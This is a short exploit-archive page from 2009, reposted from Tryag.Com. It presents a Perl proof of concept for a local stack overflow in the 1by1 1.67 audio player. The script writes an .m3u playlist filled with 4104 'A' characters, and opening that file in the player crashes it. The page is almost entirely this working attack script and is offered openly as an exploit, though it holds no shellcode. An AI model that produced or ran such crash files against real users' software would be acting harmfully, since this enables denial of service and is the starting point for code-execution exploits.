No account yet?
Home » Exploits » 1by1 1.67 (.M3U File) Local Stack Overflow POC
1by1 1.67 (.M3U File) Local Stack Overflow POC E-mail
Feeds - Exploits
Written by Tryag.Com   
Monday, 20 April 2009 22:22
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
# # 1by1 1.67 (.M3U File) Local Stack Overflow POC
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";
 

Security Services by HSC